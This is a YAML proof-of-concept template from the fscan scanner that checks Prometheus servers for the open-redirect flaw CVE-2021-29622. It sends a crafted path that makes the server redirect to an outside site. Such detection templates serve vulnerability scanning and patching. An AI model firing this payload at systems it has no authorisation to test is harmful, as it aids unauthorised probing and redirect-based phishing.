fscan/webscan/pocs/prometheus-url-redirection-cve-2021-29622.yml

name: poc-yaml-prometheus-url-redirection-cve-2021-29622
rules:
  - method: GET
    path: /new/newhttps:/baidu.com
    follow_redirects: false
    expression: |
      response.status == 302 && response.headers["location"] == "https:/baidu.com?"      
detail:
  author: fuzz7j(https://github.com/fuzz7j)
  links:
    - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7